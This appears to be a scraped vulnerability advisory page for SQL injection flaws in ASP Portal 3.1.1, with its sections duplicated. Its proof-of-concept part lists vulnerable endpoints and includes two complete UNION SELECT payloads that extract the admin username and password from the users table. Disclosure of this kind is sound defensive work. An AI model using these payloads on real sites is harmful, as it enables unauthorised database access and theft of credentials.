ASP Portal Multiple SQL Injection Vulnerabilities
BID:17174
Info
ASP Portal Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 17174 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2006 12:00AM |
| Updated: | Mar 21 2006 11:04PM |
| Credit: | nukedx is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
ASP Portal ASP Portal 3.1.1 |
| Not Vulnerable: | |
Discussion
ASP Portal Multiple SQL Injection Vulnerabilities
ASP Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Some of these issues may require administrative privileges to exploit.
ASP Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Some of these issues may require administrative privileges to exploit.
Exploit / POC
ASP Portal Multiple SQL Injection Vulnerabilities
This issue can be exploited via a web client.
The following proof of concept URI are available:
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=[SQLCode]
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='admin'
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
http://www.example.com/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode]
http://www.example.com/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode]
http://www.example.com/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode]
http://www.example.com/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode]
http://www.example.com/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode]
http://www.example.com/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2
http://www.example.com/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=1
An exploit is available for the download_click.asp issue:
This issue can be exploited via a web client.
The following proof of concept URI are available:
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=[SQLCode]
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='admin'
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
http://www.example.com/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode]
http://www.example.com/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode]
http://www.example.com/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode]
http://www.example.com/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode]
http://www.example.com/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode]
http://www.example.com/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2
http://www.example.com/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=1
An exploit is available for the download_click.asp issue:
Solution / Fix
ASP Portal Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
ASP Portal Multiple SQL Injection Vulnerabilities
References:
References: